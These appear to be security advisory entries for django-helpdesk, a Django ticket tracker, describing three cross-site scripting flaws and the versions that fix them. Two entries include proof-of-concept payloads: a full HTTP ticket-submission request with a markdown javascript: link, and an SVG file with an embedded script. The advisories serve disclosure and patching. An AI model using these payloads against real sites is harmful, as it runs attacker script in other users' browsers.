Cross-site Scripting (XSS)django-helpdesk is a Django-powered ticket tracker for your helpdesk
Affected versions of this package are vulnerable to Cross-site Scripting (XSS) via Markdown at Description or Comment of a ticket. When rendering to Markdown, the application does not filter and check if the properties are valid.
##POC:
POST /tickets/submit/ HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8080/tickets/submit/
Content-Type: multipart/form-data; boundary=---------------------------69350364819088505273728279714
Content-Length: 1161
Origin: http://127.0.0.1:8080
DNT: 1
Connection: close
Cookie: csrftoken=UQd46tUHKV3P08qcvIBTOBWDzS9nDZT8TDeCT6W8ThDUPLdWgKmlxwF3bBEGThC0
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="csrfmiddlewaretoken"
o6SgjwQ9VozjIi2mYHAi5ImkD7UbKviMnTTO69SA4K9oxVP6JJlKOD5KfQpu0N1E
-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="queue"
1
-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="title"
XSS Markdown
-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="body"
[XSS](javascript:alert(`document.domain`))
-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="priority"
3
-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="due_date"
-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="attachment"; filename=""
Content-Type: application/octet-stream
-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="submitter_email"
xss@test.com
-----------------------------69350364819088505273728279714--
How to fix Cross-site Scripting (XSS)? Upgrade django-helpdesk to version 0.3.2 or higher.
| |
Cross-site Scripting (XSS)django-helpdesk is a Django-powered ticket tracker for your helpdesk
Affected versions of this package are vulnerable to Cross-site Scripting (XSS) via upload Attachments with format .svg or .html.
PoC
// PoC.svg
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("XSS");
</script>
</svg>
How to fix Cross-site Scripting (XSS)? Upgrade django-helpdesk to version 0.3.1 or higher.
| |
Cross-site Scripting (XSS)django-helpdesk is a Django-powered ticket tracker for your helpdesk
Affected versions of this package are vulnerable to Cross-site Scripting (XSS) via lack of sanitization in the title of tickets created.
How to fix Cross-site Scripting (XSS)? Upgrade django-helpdesk to version 0.3.1 or higher.
| |
